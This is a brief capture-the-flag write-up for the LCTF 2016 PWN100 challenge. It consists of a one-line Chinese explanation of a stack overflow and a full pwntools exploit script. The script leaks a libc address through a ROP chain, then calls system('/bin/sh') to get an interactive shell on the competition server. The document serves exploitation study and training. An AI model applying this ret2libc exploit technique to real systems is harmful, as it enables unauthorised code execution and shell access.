LCTF-2016-PWN100

栈溢出。可以通过libcdb.com获取libc.so.6和对应的libc关键函数偏移。或者使用libc-database。

#!/usr/bin/env python
from pwn import *
DEBUG = 1
if DEBUG:
        context.log_level = 'debug'
        p = process('./pwn1003s4de5rf76tg87yhu')
        gdb.attach(p)
else:
        p = remote('119.28.63.211','2332')

offset___libc_start_main_ret = 0x21f45
offset_system = 0x0000000000046590
offset_dup2 = 0x00000000000ebe90
offset_read = 0x00000000000eb6a0
offset_write = 0x00000000000eb700
offset_str_bin_sh = 0x17c8c3

pop_rdi  = 0x400763
plt_puts = 0x400500
got_read = 0x601028
def pwn():
        payload = 'a'*72 + p64(pop_rdi)+p64(got_read)+p64(plt_puts)+p64(0x40068E)
        payload = payload.ljust(200)
        p.sendline(payload)
        p.recv(5)

        addr_read = u64(p.recvn(6).ljust(8,'\x00'))
        print 'read: '+hex(addr_read)

        addr_libc = addr_read - offset_read
        addr_system = addr_libc + offset_system
        addr_binsh = addr_libc + offset_str_bin_sh
        print 'libc: ' + hex(addr_libc)
        print 'system: ' + hex(addr_system)
        print 'binsh: ' + hex(addr_binsh)

        payload2 = 'b'*71 + p64(pop_rdi) + p64(addr_binsh) + p64(addr_system) + p64(0xdeadbeef)
        payload2 = payload2.ljust(200)
        p.sendline(payload2)
        p.interactive()
if __name__ == '__main__':
        pwn()